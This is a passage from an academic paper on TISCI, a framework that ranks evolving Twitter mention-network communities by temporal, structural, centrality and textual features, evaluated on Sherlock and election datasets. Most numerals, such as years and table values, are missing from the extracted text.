detection. both were introduced in an attempt to discard trivial information and to implicitly reduce the available content. although the amount of information was somewhat reduced, the extraction of information still remained a tedious task. hence, to further facilitate the browsing of information that a user has to scan through in order to discover items of interest, we present a sorted version of the data similarly to a search engine. the sorting of the data is performed via the ranking of dynamic communities on the basis of seven distinct features which represent the notions of time, importance, structure, context and integrity (tisci). nonetheless, the sorting of textual information and thus some kind of summarization is only a side-effect of the dynamic community ranking. the main impact lies in the identification and monitoring of persistent, consistent and diverse groups of people who are bound by a specific matter of discussion. the closest work to dynamic community ranking was recently presented by lu & brelsford ( ) in a behavioral analysis case study and as such it is used here as a baseline for comparison purposes. however, it should be mentioned that the ranking was not the primary aim of their research and that the communities were separately sorted by size thus missing the notions of importance, temporal stability and content diversity which are employed in the proposed framework. to the best of our knowledge, this is the first time that structural, temporal, importance and contextual features are fused in a dynamic community ranking algorithm for a modern online social network application. although the overall problem is covered by the more general field of evolving network mining, it actually breaks down in many smaller issues that need to be faced. table presents the decomposition of the problem into these issues, together with popular available methods which can be used to overcome them, along with the techniques employed by lu & brelsford ( ) and the ones proposed by the tisci framework which is presented here. in this work, we consider the user activity in the form of mentioning posts, the communities to which the users belong, and most importantly, the evolutionary and significance characteristics of these communities and use them in the ranking process. the proposed analysis is carried out in three steps. in the first step, the twitter api is used to extract mentioning messages that contain interactions between users and a sequence of time periods is determined based on the level of activity. then, for each of these periods, graph snapshots are created based on user interactions and the communities of highly interacting users are extracted using the infomap community detection method (rosvall & bergstrom, ). during the second step, the community evolution detection process inspects whether any communities have persisted in time over a long enough period (eight snapshots). in the last and featured step, the evolution is studied in order to rank the communities and their metadata (i.e., tweeted text, hashtags, urls, etc.) with respect to the communities’ persistence, stability, centrality, size, diversity and integrity characteristics, thus creating dynamic community containers which provide structured access to information. the temporal (evolutional) and contextual features are also the main reason why a static community detection method was employed instead of a dynamic method which konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table deconstruction of the evolving network mining problem. subproblem available methods lu & brelsford ( ) proposed framework event-based time-based granularity selection activity-based event-based time-based louvain infomap community detection modularity optimization infomap infomap jaccard sorensen euclidean set similarity cosine jaccard jaccard reciprocal rank multi-criteria analysis feature fusion condorcet none reciprocal rank fusion size centrality information ranking tisci size tisci would aggregate the information such as the one proposed by nguyen et al. ( ). in order to evaluate the proposed framework it is applied on three datasets extracted from twitter to demonstrate that it can serve as a means of discovering newsworthy pieces of information and real-world incidents around topics of interest. the first dataset was collected by monitoring discussions around tweets containing vocabulary on the season of bbc’s sherlock, the second and third contain discussions on greece’s january and september elections, and the last one containing vocabulary regarding the presidential elections in the us (aiello et al., ). three community detection methods are also employed to demonstrate that infomap is the preferable scheme. due to the lack of ground truth datasets for the evaluation of the proposed framework, we devised and are proposing a novel, context-based evaluation scheme which could serve as a basis for future work. it is our belief that by studying the contents of discussions being made in groups and the evolution of these groups we can produce a better understanding of the users’ and communities’ behavior and can give deeper insights into unfolding large-scale events. consequently, our main contributions can be summed up in the following: • a novel ranking framework for dynamic communities based on temporal and contextual features; • a context-based evaluation scheme aimed to overcome the absence of ground truth datasets for the community discovery analysis; • an empirical study on three twitter datasets demonstrating the merits of the proposed framework. an additional asset of the tisci ranking method, which is the main contribution of this paper, is that it was created to work with any kind of community evolution detection konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. method that retains discrete temporal information and that it is independent of the choice of the community detection algorithm applied to the individual timeslots. related work mining osn interactions is a topic that has attracted considerable interest in recent years. interaction analysis provides insights and solutions to a wide range of problems such as cyber-attacks (wei et al., ), recommendation systems (kim & shim, ; gupta et al., ), summarization (schinas et al., ; lin, sundaram & kelliher, ) and information diffusion (yang, mcauley & leskovec, ). one of the most recent attempts comes from mckelvey et al. ( ) who presented the truthy system for collecting and analyzing political discourse on twitter, providing real- time, interactive visualizations of information diffusion processes. they created interfaces containing several key analytical components. these elements include an interactive layout of the communication network shared among the most retweeted users of a meme and detailed user-level metrics on activity volume, sentiment, inferred ideology, language, and communication channel choices. twitinfo is another system that provides network analysis and visualizations of twitter data. its content is collected by automatically identifying ‘‘bursts’’ of tweets (marcus et al., ). after calculating the top tweeted urls in each burst, it plots each tweet on a map, colored according to sentiment. twitinfo focuses on specific memes, identified by the researchers, and is thus limited in cases when arbitrary topics are of interest. both of the aforementioned frameworks present an abundance of statistics for individual users but contrary to our method, they do not take into account the communities created by these users or the evolution of these communities. greene, doyle & cunningham ( ) presented a method in which they use regular fortnight time intervals to sample a mobile phone network in a two month period and extract the communities created between the users of the network. although the network selected is quite large and the method is also very fast; the system was created in order to be applied on a mobile phone network which renders it quite different to the networks studied in this paper. the collected data lack the topic of discussion and the content of the messages between users, so there is no way to discover the reason for which a community was transformed or the effect that the transformation really had on the topic of that community. moreover, although the features of persistence and stability are mentioned in the paper, no effort was made in ranking the communities. nonetheless, due to its speed and scalability advantages, in this paper we decided to employ and extend their method by introducing a couple of optimization tweaks which render it suitable for large scale applications such as the analysis of an osn. finding the optimal match between communities in different timeslots was proposed in tantipathananandh, berger-wolf & kempe ( ), where the dynamic community detection approach was framed as a graph-coloring problem. since the problem is np- hard, the authors employed a heuristic technique that involved greedily matching pairs of node-sets in between timeslots, in descending order of similarity. although this technique konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. has shown to perform well on a number of small well-known social network datasets such as the southern women dataset, as the authors state in the paper, it does not support the identification of dynamic events such as community merging and splitting thus losing significant information which is of utmost importance in the proposed ranking framework which heavily relies on the content and context of the tweets. takaffoli et al. ( ) considered the context of the enron ( email addresses in the last year from the original dataset) and dblp (three conferences from to ) datasets for evaluation purposes, but similar to greene, doyle & cunningham ( ) they also studied the context independently of community evolution. they focused on the changes in community evolution and the aver- age topic continuation with respect to changes in the similarity threshold. the analyzed data presented valuable information as to how to select the similarity threshold but no insight as to important communities, their users or specific topics. another dynamic community detection method used to extract trends was introduced by cazabet et al. ( ). they created an evolving network of terms, which is an abstraction of the complete network, and then applied a dynamic community detection algorithm on this evolving network in order to discover emerging trends. although the algorithm is very effective for locating trends, it does not consider the interactions made between various users or the evolution of the communities. the work by lin, sundaram & kelliher ( ) bears some similarities in terms of motivation as they also want to gain insights into large-scale involving networks. they do this via extracting themes (concepts) and associating them with users and activities (e.g., commenting) and then try to study their evolution. however, they provide no way of ranking the extracted themes, which is the focus of our work. one of the main problems in detecting influential communities in temporal networks is that most of the time they are populated with a large amount of outliers. while tackling the problem of dynamic network summarization, qu et al. ( ) capture only the few most interesting nodes or edges over time, and they address the summarization problem by finding interestingness-driven diffusion processes. ferlez et al. ( ) proposed timefall which performs time segmentation using cut- points, community detection and community matching across segments. despite the fact that they do not rank the communities, the proposed scheme could be employed to extract and detect evolving communities which would in turn be ranked by the tisci framework. in mucha et al. ( ), the concept of multiplex networks is introduced via the extension of the popular modularity function and by adapting its implicit null model to fit a layered network. here, each layer is represented with a slice. each slice has an adjacency matrix describing connections between nodes which belong to the previously considered slice. essentially, they perform community detection on a network of networks. although these frameworks technically require a network to be node-aligned (all nodes appear in all layers/timeslots), they have been used explicitly to consider relatively small networks in which that is not the case by using zero-padding. however, this creates a huge overhead in osns since the majority of users does not appear in every timeslot. in addition, mucha et konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. al. ( ) do not provide any method for the ranking of the extracted communities, which is the focus of this paper. a method for ranking communities, specifically quasi-cliques, was proposed by xiao et al. ( ) in which they rank the respective cliques in respect to their betweeness centrality. however, they also do not take temporal measures into consideration and apply their method on a call graph from a telecom carrier and a collaboration network of co-authors thus excluding the context of the messages. the most recent work regarding the extraction of information using evolving communities was presented in lu & brelsford ( ) which studied the behavior of people discussing the japanese earthquake and tsunami. although they did rank the static communities by size, the evolution regarded only the before and after periods, so no actual dynamic community ranking was performed. osn analysis framework osn applications comprise a large number of users that can be associated to each other through numerous types of interaction. graphs provide an elegant representation of data, containing the users as their vertices and their interactions (e.g., mentions, citations) as edges. edges can be of different types, such as simple, weighted, directed and multiway (i.e., connecting more than two entities) depending on the network creation process. notation in this paper, we employ the standard graph notation g=(v,e,w), where g stands for the whole network; v stands for the set of all vertices and e for the set of all edges. in particular, we use lowercase letters (x) to represent scalars, bold lowercase letters (x) to represent vectors, and uppercase letters (x) to represent matrices. a subscript n on a variable (xn) indicates the value of that variable at discrete time n. we use a snapshot graph to model interactions at a discrete time interval n. in gn, each node vi ∈vn represents a user and each edge eij ∈en is associated with a directed weight wij corresponding to the frequency of mentions between vi and vj. the interaction history is represented by a sequence of graph snapshots 〈g ,g ,...,gn,...〉. a community ci,n which belongs to the set of communities c = { c , ,...,ci,n,... } is defined here as a subgraph comprising a subset vcomm ⊆v of nodes such that connections between the nodes are denser than connections with the rest of the network. a dynamic community ti,n which belongs to the set t = { t , ,...,ti,n,...,ti,n− } of time-evolving communities, is defined as a series of subgraphs that consist of subsets of all the nodes in v and the set of interactions among the nodes in these subsets that occur within a set of n timeslots. framework description this section describes the proposed framework in three parts: community detection, community evolution detection and ranking. figure illustrates all the steps of the proposed framework. konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. community size pre-processsing (information extraction) temporal adjacency matrices formation temporal data discretization community evolution detection community detection (infomap) ranking & info fusion evolution detection process twitter data mentions, hashtags, urls and text in time persistence x stability textual diversity centrality theseus coef. popular hashtags,urls, textual content most influential users and communities size dyccos (json) outcome figure block diagram of the proposed framework. interaction data discretization and graph creation the tweet timestamp and a corresponding sampling frequency are used to group the interactions into timeslots. the selection of time granularity (inverse sampling frequency) for each network is based on the change in activity. the aim is to create clear sequential graph snapshots of the network as presented in fig. . the sampling time should be meaningful on its own (hours, days) but individually for each case as well. for example, for the greek election and sherlock series datasets, a -hour period was selected to detect day-by-day changes to the flourishing discussions during the anticipation period of the corresponding events (election day, episode broadcasting) and the post-event reactions. the -hour period in conjunction with the deep search performed during the evolution konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) (b) (c) (d) figure referencing frequency activity for the four networks. (a) january greek elections, (b) september greek elections, (c) us elections and (d) bbc’s sherlock series. detection process, allows the framework to discover persistent communities over a one week time-frame. every node in the resulting graphs represents a twitter user who communicated tweets in the datasets by mentioning or being mentioned. a mention, and thus a directed edge between two users is formed when one of the two creates a reference to the other in his/her posted content via use of the @ symbol. the number of mentions between them forms the edge weight. community detection given a social network, a community can be defined as a subgraph comprising a set of users that are typically associated through a common element of interest. this element can be as varied as a topic, a real-world person, a place, an event, an activity or a cause (papadopoulos et al., ). we expect to discover such communities by analyzing mention networks on twitter. there is considerable work on the topic and a host of different community detection approaches appear in literature (fortunato, ; papadopoulos et al., ). due to the nature of twitter mention networks, notably their sparsity and size, in this paper we apply the infomap method (rosvall & bergstrom, ) to detect the underlying community structures. infomap optimizes the map equation (rosvall, axelsson & bergstrom, ), which exploits the information-theoretic duality between the problem of compressing data, and the problem of detecting and extracting significant patterns or structures within those data. the infomap method is essentially built based konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table number of detected dynamic communities with and without the timeslot delay. louvain newman infomap delay , , , us election no delay , delay , , , sherlock no delay , delay , greek election january no delay delay greek election september no delay on optimizing the minimum description length of the random walk on the network. the infomap scheme was selected for three reasons; first, according to lancichinetti & fortunato ( ) and granell et al. ( ) and our own preliminary results, infomap is very fast and outperforms even the most popular of community detection methods such as louvain (blondel et al., ) and newman’s modularity optimization technique (newman, ). further, the low computational complexity of o(m) (m signifies the number of edges in a graph) encourages its use on graphs of large real networks. last, lu & brelsford ( ) used it in their experimental setup and as such it is suitable for comparative purposes. it should be noted that the focus of the framework is to rank the dynamic communities independently from the method used for their detection and not to perform an exhaustive comparison of algorithms able to process dynamic networks. nonetheless, fig. as well as table provide support in favor of infomap in comparison to the louvain and newman methods, as infomap detects the most communities and significantly more from the middle region. figures , c and d show the performance of the louvain and the modularity optimization technique. they both seem to detect either very large or relatively small communities, which are out of the middle section. the middle section poses the most interest for this study as it contains reasonably populated groups for the purposes of a discussion. in the future, it may be interesting to thoroughly investigate the sensitivity of results with respect to the employed community detection method. community evolution detection the problem of finding communities in static graphs has been addressed by researchers for several years (blondel et al., ; newman, ; giatsoglou, chatzakou & vakali, ). however, the highly dynamic nature of osns has moved the spotlight to the subject of dynamic graph analysis (nguyen et al., ; asur, parthasarathy & ucar, ; giatsoglou & vakali, ; palla, barabasi & vicsek, ; takaffoli et al., ; roy chowdhury & sukumar, ). in this paper, we represent a dynamic network as a sequence of graph snapshots 〈g ,g ,...,gn,...〉. the objective is to detect and extract dynamic communities t by identifying the communities c that are present in the network across a set of n timeslots and create a container which includes a variety of metadata such as popular hashtags and urls, influential users and the posted text. a dynamic community is represented by the konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure community jaccard distance (similarity) over community size. results using the infomap (a, b), newman (c, d) and louvain (e, f) community detection algorithms for the bbc’s sherlock se- ries (a, c, e) and the us elections (b, d, f). the red dots signify the undetected communities which were missed due to the absence of the time-delay search, whereas the blue-ones signify commonly detected communities. konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) (b) (c) (d) figure population of matching nodes per timeslot for the sherlock dataset. (a) infomap with a threshold of . (tisci), (b) infomap with a threshold of . (lu & brelsford, ), (c) louvain with a threshold of . (greene, doyle & cunningham, ) and (d) newman with a threshold of . . every line is essentially a dynamic community. timeline of the communities of users that it comprises. the difference between sets c and t is that the former contains every static community in every available timeslot, whereas the latter contains sequences of communities that evolve through time. in both ci,n and ti,n i is a counter of communities and dynamic communities respectively, while particularly in ti,n n represents the timeslot of birth of the dynamic community. figure presents an example of the most frequent conditions that communities might experience: birth, death, irregular occurrences, merging and splitting, as well as growth and decay that register when a significant percentage of the community population is affected. in the example of fig. , the behavior of six potential dynamic communities is studied over a period of three timeslots (n− ,n,n+ ). dynamic community t ,n−x originated from a previous timeslot n−x which then split up into a fork formation in timeslot n. in t ,n−x, x is an integer valued variable representing the timeslot delay which can acquire a maximum value of d ( ≤x ≤d≤n). the split indicates that for some reason the members of c ,n− broke up into two separate smaller groups in timeslot n, which also explains the change in size. in our case it could be that a large group of users engaged in conversation during n− but split up and are not cross mentioning each other in n and n+ . moreover, although the konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. second group (c ,n) instigated a new dynamic community t ,n, it continued its decaying activity for one more timeslot and then dispersed (community death). nonetheless, both are obviously important to the evolution of the community and the separation poses a great interest from a content point of view as to the ongoing user discussion and as to why they actually split up. both can be answered by using the metadata stored in the container corresponding to the dynamic community. a dual example is that of t ,n− and t ,n−x in which two communities started up as weak and small but evolved through a merger into one very strong, large community that continues on to n+ . in this case it could be that two different groups of people witnessed the same event and began conversing on it separately. as time went by, connections were made between the two groups and in the n timeslot they finally merged into one. actually, the community continued to grow as shown on the n+ timeslot. t ,n− and tn/a were both created (community birth) in n− and both disappeared in n differentiating in that t ,n− reappears in n+ (irregular occurrence) while tn/a does not and thus a dynamic community is not registered. this is the main reason why a timeslot delay is introduced in the system as will be described later; a search strictly between communities of consecutive timeslots would result in missing such re-occurrences. to study the various lifecycle stages of a community, the main challenge pertains to the computational process used to identify and follow the evolution of any given community. on the one hand, it should be able to effectively map every community to its corresponding timeline, and on the other hand it should be as less of a computational burden as possible to be applicable to massive networks. however, community matching techniques presume a zero-to-one or one-to-one mapping between users in two communities, thus not supporting the identification of the above conditions in the lifecycle of a dynamic community. in order to overcome this predicament, we employ a heuristic by greene, doyle & cunningham ( ) relying on a user-defined threshold to determine the matching between communities across different timeslots. the algorithm steps are presented in more detail as follows. initially, the first set of communities {c ,c ,...,ci ,...,ck } (i.e., the first snapshot) is extracted by applying the infomap community detection algorithm (rosvall & bergstrom, ) to the g graph. a dynamic community marker ti, (where i=[ ,k]) is assigned to each community from this snapshot. next, the second set of communities is extracted from the g graph and a matching process is performed between all the community combinations from the two consecutive snapshots in order to determine any possible evolution from the first snapshot to the next. the dynamic communities t( , ,...,k), are then updated based on that evolution. for example, if ca does not appear in the second snapshot, ta, is not updated; a split is registered if the community appears twice in the new timeslot, and a merger marker is assigned if two or more communities seem to have merged into one. one of the problems community evolution detection processes face is the lack of consistency in the users’ behavior. the lack of consistent and sequential behavior results in communities being labeled dead when in fact they could just be delayed. in order to avoid potential false positives of community deaths, a trail of several snapshots is retained; meaning that the search covers a wider range of timeslots in total instead of just the konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a study of six potential dynamic communities tracked over three timeslots. the seven most frequent conditions that communities might experience are birth (concentric circles), death (no exiting arrow), irregular occurrences (skipped timeslot), merging and splitting, as well as growth and decay. immediate previous one. the length of the trail depends on the selected granularity of the discretization process, in a manner that a meaningful period is covered (i.e., if the sampling is performed on a daily basis, the trail will consist of seven timeslots in order to provide a week’s depth). hence, if the evolution of a community is not detected in the immediate to last timeslot, the system queries the d previous ones in a ‘‘last come, first served’’ order. this means that the search progresses through the trail until a match is found, in which case the search is terminated and the dynamic community is observed to have skipped a timeslot. if no matching community is detected, the community is considered dead. the proof of necessity for such a delay is shown on table . the evolution detection procedure is repeated until all graphs have been processed. it should be noted that the decision for the delay being set to only a few timeslots instead for the whole trail, was made by considering the computational burden of the system in conjunction to the fact that people lose interest. if the users comprising the community do not engage in the discussion for a significant period of time, it would be safe to say, that the community has been dismantled. in order to determine the matching between communities, the jaccard coefficient is employed (jaccard, ). following comparative preliminary results between the jaccard konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and the sorensen index (dice coefficient) (sørensen, ), the former was selected due to its efficiency. in fact, the jaccard similarity is still one of the most popular similarity measures in community matching (yang, mcauley & leskovec, ; alvarez, sanz-rodríguez & cabrera, ). the similarity between a pair of consecutive communities cin and c(i(n−td)) is calculated by use of the following formula, where timeslot delay td ∈[ , ]: j ( cin,ci(n−td) ) = ∣∣cin∩ci(n−td)∣∣∣∣cin∪ci(n−td)∣∣. ( ) if the similarity exceeds a matching threshold φ, the pair is matched and cin is added to the timeline of the ti,n dynamic community. as in greene, doyle & cunningham ( ), takaffoli et al. ( ) and lu & brelsford ( ), the similarity threshold φ is a constant threshold. following a more extensive analysis on the impact of the threshold selection, greene suggested the use of . which concurs with our own results. figure illustrates that . allows the creation of many strings of small communities, whereas . suppresses a lot of communities from the middle region which holds most of the information required for a fuller investigation. dynamic community ranking using tisci although the evolution detection algorithm is efficient enough to identify which communities are resilient to the passing of time, it does not provide a measure as to which communities are worth looking into and which are not. a solution to this shortcoming is presented here via the tisci score that ranks the evolving communities on the basis of seven distinct features which represent the notions of time, importance, structure, context and integrity. specifically, we employ persistence and stability which are temporal measures, normalized-community-centrality which is a relational importance measure, community-size which is a structural measure, mean-textual-entropy and unique-url average which are contextual measures, and an integrity coefficient inspired by the ‘‘ship of theseus’’ paradox. persistence is defined as the characteristic of a dynamic community to make an appearance in as many timeslots as possible (i.e., overall appearances/total number of timeslots), and stability as the ability to appear in as many consecutive timeslots as possible disregarding the total number of appearances (i.e., overall consecutive appearances/total number of timeslots). persistence(tx,y)= ∑m n= δ[a[n]] m stability(tx,y)= ∑m n= δ[a[n]−a[n− ]] m− where δ is the impulse function, m represents the total number of timeslots, x,y are the labels of the oldest community in tx,y and a[n]= { ∀ci,n∈tx,y otherwise } . ( ) konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we expect consistent dynamic communities to be both persistent and stable as the combination of these features shows either a continuous interest in a subject or its evolution to something new. as such we combine the two features into one via multiplication. figure shows how stable and how persistent the communities are with respect to the actual number of persistent users. moreover, it shows the number of people who persist in time within a community in respect with the community’s persistence and stability for the infomap as well as for the louvain and newman methods. google’s pagerank (brin & page, ) is used as the centrality feature which measures the number and quality of links to a community in order to determine an estimate of how important that community is. the same measure is also applied to the users from every dynamic community, ranking them according to their own centrality and thus providing the most influential users per timeslot. there is however a difference between the two in how the final centrality values are extracted, since different timeslots create different populations between the static graphs. although this does not affect the users’ centralities as they are compared to each other within the timeslot, it does however influence the communities’ centrality measures due to the difference in populations. in order to compare centrality measures from different timeslots, we employ the normalized pagerank solution as proposed in berberich et al. ( ). the mean centrality as it is used here is defined as: mc(tx,y)= ∑m n= ∑k i= normpr(cin∈tx,y)∑m n= ∑k i= a[in] ( ) where k is the number of communities per timeslot. one of the measures that provides a sense of popularity is virality which in the case of twitter datasets translates into multiple bursts of mentions in a short time. this can happen either due to an event or because an influential user (e.g., major newspaper account) posted something of interest. on the other hand, lu and berlsford used the lack of increased community size as an indication of disruption in the telecommunication services. for this reason we consider the increased size of a dynamic community as a feature that requires attention. here, the feature of size is defined as the average size of the static communities that comprise it. the integrity measure employed is an extension of the ship of theseus coefficient. the ship of theseus, also known as theseus’s paradox, is a thought experiment that raises the question of whether an object which has had all its components replaced remains fundamentally the same object (rea, ). we apply this theory to find out the transformation sustained by the dynamic community by calculating the number of consistent nodes within the communities which represents the integrity and consistency of the dynamic community. twitter datasets differ quite a lot to other online social networks since the user is restricted to characters of text. given this restriction, we assume that it is safe to say that there is a connection between the entropy of tweeted words used in a community (discarding urls, mentions, hashtags and stopwords), the effort the users put into posting those tweets, and the diversity of its content. whether there is a discussion between the konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. users or a presentation of different events, high textual entropy implies a broader range of information and therefore more useful results. an added bonus to this feature is that spam and empty tweets containing only hashtags or mentions, as is the case in url attention seeking tweets, rank even lower than communities containing normal retweets. for the ranking we employ the mean textual diversity of the dynamic community. the textual diversity in a community ci is measured by shannon’s entropy h of the text resulting from the tweets that appear in that community as follows: h(ci)= k∑ m= −p(wm)log (p(wm)) ( ) where p(wm) is the probability of a word wm appearing in a community containing m words and is computed as follows: p(wm)=(freq(wm))/(m). ( ) the second contextual feature to be employed regards the references cited by the users via urls in order for them to point out something they consider important or interesting. in fact, the urls hold a lot more information than the single tweet and as such we also consider it useful for discovering content-rich communities. the ranking in this case is performed by simply computing the average of unique urls in each dynamic community over time. since we have an array of six features, we have to combine them into a single value in order to rank the dynamic communities. the final ranking measure for every dynamic community is extracted by employing the reciprocal rank fusion (rrf) (cormack, clarke & buettcher, ) method; a preference aggregation method which essentially provides the sum of the reciprocals ranks of all extracted aforementioned features q: rrf = |q|∑ q= α+rankq ( ) where α is a constant which is used to mitigate the impact of high rankings by outlier systems. cormack, clarke & buettcher ( ) set the constant to according to their needs although the choice, as they state, is not critical and thus we prefer a lower score equal to the number of dynamic communities to be considered. despite its simplicity, the rrf has proven to perform better than many other methods such as the condorset fuse or the well established combmnz (cormack, clarke & buettcher, ) and is considered one of the best baseline consensus methods (volkovs, larochelle & zemel, ). in addition, it requires no special voting algorithm or global information and the ranks may be computed and summed one system at a time, thus avoiding the necessity of keeping all the rankings in memory. however, this preference aggregation method is not without flaws, as it could potentially hide correlations between feature ranks. although, in other applications this could pose a problem, as shown in table the lack of correlation between the features’ ranks encourages us to employ this simple but useful method. the correlation was measured using the spearman rank-order correlation coefficient. konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table feature ranking similarity comparison using spearman’s rank correlation coefficient averaged across all three datasets. centrality perstability size textdiversity theseus urldiversity tisci centrality . . . . − . . . perstability . . . . . . . size . . . . . . . textdiversity . . . . . . . theseus − . . . . . − . . urldiversity . . . . − . . − . tisci . . . . . − . . complexity and scalability when it comes to temporal interaction analysis, scalability is always an issue. the cost of the tisci framework is o(m+k +c ·w) where m are the number of edges for the infomap method, k is the number of communities of each row in the evolution detection scheme, and c and w are the numbers of dynamic communities and words in each community in the ranking stage. although currently, the framework would not scale well due to the squared complexity of the evolution detection process, future work will involve the use of local sensitivity hashing to speed up the operation. experimental study despite the proliferation of dynamic community detection methods, there is still a lack of benchmark ground truth datasets that could be used for the framework’s testing purposes. instead, the results presented in this paper were attained by applying our framework on three twitter interaction network datasets as described in the following section. datasets the tweets related to the us election of were collected using a set of filter keywords and hashtags chosen by experts (aiello et al., ). keywords and hashtags in greek and english containing all the greek party names as well as their leaders’ were used for the greek elections of . last, variations of the names ‘sherlock’ and ‘watson’ were used for the sherlock series dataset. we chose these three datasets as they all share a number of useful features but also have significant differences as one may deduce from the data description and the basic network characteristics which are presented in table . on the one hand all of the datasets regard major events that generate a large volume of communication and are mostly dominated by english-language contributors, making analysis simpler for the majority of researchers. on the other hand, the us election (including voting, vote counting, speculation about results and subsequent analysis) lasted two days, whereas the greek elections and the sherlock frenzy lasted days and two weeks, respectively. similarly, in an event focused discussion such as the us election, almost all the focus is either on specific events/announcements or specific people associated with the events, whereas topics in a general discussion regarding a fictitious character tend to be more spread out over time and to overlap with other topics while becoming more active when specific events take place. these differences help us understand the ways that social networks are used in konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table dataset statistics. sherlock us election gr election jan gr election sep # of tweets , , , , , , , , # of tweets with mentions , , , , , , , # of hashtags , , , , , , # of urls , , , , # of unique users , , , , , # of edges , , , , , , , # of communities , , , , # reduced communities , , , , # of evolution steps , , , , # of dynamic communities , , , sampling time h h h h very different circumstances as well as that the variation in temporal structure depends heavily on the query itself. sherlock holmes dataset this real-world dataset is a collection of mentioning posts acquired by a crawler that collected tweets containing keywords and hashtags which are variations of the names ‘sherlock’ and ‘watson.’ the crawler ran over a period of two weeks; from the st of december to the th of january , extracting messages containing mentions. the evolution detection process discovered , dynamic communities comprising , snapshot communities. the information we sought pertained to the various communities created between people who interact via mentions and are interested in the bbc’s sherlock series, people who are influenced by these communities and any news that might give us more insight on this world wide phenomenon. the dynamic community structure resulting from this dataset is totally different from the two election ones in more ways than one. initially, there are many diverse and smaller communities which persist over time that seem to be fairly detached from the rest. this means that the interest here is widely spread and the groups of people discussing the imminent or last episode of the series are smaller indicating that in most cases we are looking into friends chatting online. nonetheless, the user can still acquire a variety of information such as the general feeling of the viewers, several spoilers regarding each episode, a reminder about when each episode starts and on what day, and also statistics on the viewership of the series. the latter was extracted from one of the largest communities which informed us that not only was the first episode viewed by an average of . million viewers but also that chinese fans relish the series and especially the love theory between the two main characters (http://www.bbc.com/news/blogs-china-blog- ). other typical topics of conversation include the anticipation of the series, commentary regarding the quality of the episode, commentary regarding the character and many more typical lines of discussion. a short list of findings is presented on table . what is interesting enough is that conversations and opinions regarding the bad habits or the sexuality of the konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.bbc.com/news/blogs-china-blog- http://dx.doi.org/ . /peerj-cs. table key findings from the sherlock dataset. finding url (if available) creators reveal they already have series four mapped out https://goo.gl/ zdcmt cumberbatch’s parents make sherlock cameo https://goo.gl/qpgtaj chinese fans relish new sherlock gay love theory as fans relish new series episode scores highest timeshifted audience in uk tv history https://goo.gl/pkfhjs january th is sherlock’s birthday character are pretty high in the rankings and that there are plenty of non-english speaking communities. one last remark concerns the dycco (ranked # ) which contains a plethora of shopping labels. usually, consecutive shop labels are an indication of spam as they are usually consistent, stable and contain urls with the sole purpose to lure a potential customer. however, in this case the shopping labeled communities contain references to books, movies and the original series of sherlock holmes sold by major retailers, thus classifying the dycco as one that a sherlock enthusiast would actually be interested in. us election dataset the united states presidential election of was held on november th in . the respective dataset was collected by using a set of filter keywords and hashtags chosen by experts (aiello et al., ). despite retrieving tweets for specific keywords only, the data collected was still too large for a single user to organize and index in order to extract useful information. here, the granularity selection of three hours was made based on the fact that there is a discrete but not wild change in activity. by employing a coarser granularity instead of an hourly one serves to reduce the time zone effect. moreover, since all four political debates in lasted for an hour and a half, then twice the span of a debate seemed like a reasonable selection for twitter users to engage in a political discussion. studying the top dyccos provides a variety of stories which does not only contain mainstream news but other smaller pieces of information that journalists seek out. the first one for example, which is also the most heavily populated, regards a movement of motivating women into voicing their opinion by urging them to post photos of their ‘‘best voting looks’’ but also pleading for tony rocha (radio producer) to use his influence for one of the nominees. the first static community alone includes , people, some of which are @kalihawk, @lenadunham, @ammaasante, @marieclaire and others. overall, during election day people are mostly trying to collect votes for their candidate of choice by either trying to inspire themselves or ask from a celebrity to do so; whereas after the fact, everyone is either posting victory or hate posts, or commenting on what the election will bring the following day, whether or not the election was falsified/rigged. at all times people are referencing a number of journalists, bloggers and politicians (herman cain, pat dollard) as well as various newspapers, tv channels and famous blogs. other examples include comments on racism stopping due to the reelection, a book on president obama, konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://goo.gl/ zdcmt https://goo.gl/qpgtaj https://goo.gl/pkfhjs http://dx.doi.org/ . /peerj-cs. table key findings from the us election dataset. finding url (if available) women’s voting motivational movement on instagram https://goo.gl/oks u president obama hoops with s. pippen on election day https://goo.gl/ybg z iran and russia among countries with messages for obama https://goo.gl/hgiaan mainstream media tipped the scales in favor of obama foxnews(removed) anti-obama protests escalate at university washpost(removed) table key findings from the greek elections datasets. finding url (if available) euro hits an -year low following the syriza party victory (removed) candidate slapped pollster over bad numbers announcement (removed) tsipras regains slim lead hours ahead of greek vote https://goo.gl/fza ux vandalisms at syriza and new democracy polling centers https://goo.gl/ yefrp far-right party is the most voted by the unemployed https://goo.gl/ydzd r posts by a number of parishes and many more which 